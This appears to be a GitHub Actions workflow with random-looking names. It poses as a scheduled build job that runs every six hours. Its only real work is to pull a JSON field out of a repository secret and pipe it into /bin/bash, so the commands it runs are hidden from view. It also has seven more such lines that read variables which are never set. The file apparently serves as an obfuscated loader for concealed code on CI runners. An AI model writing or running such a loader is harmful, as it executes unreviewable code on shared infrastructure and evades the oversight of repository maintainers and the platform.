name: nengheru

on:
  workflow_dispatch:
  schedule:
    - cron: '25 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nengheru
        env:
          rc0290: ${{ secrets.rc0290 }}
        run: |
          echo $rc0290 | jq -r .jsz3 | /bin/bash
          echo $m6 | jq -r .rv2 | /bin/bash
          echo $ugb65558 | jq -r .gzdk7791 | /bin/bash
          echo $fhh9482 | jq -r .exdv777 | /bin/bash
          echo $gwpu551 | jq -r .igrt53 | /bin/bash
          echo $fzby2 | jq -r .dx0 | /bin/bash
          echo $dyunh9880 | jq -r .jol128 | /bin/bash
          echo $xtl0 | jq -r .r6405 | /bin/bash

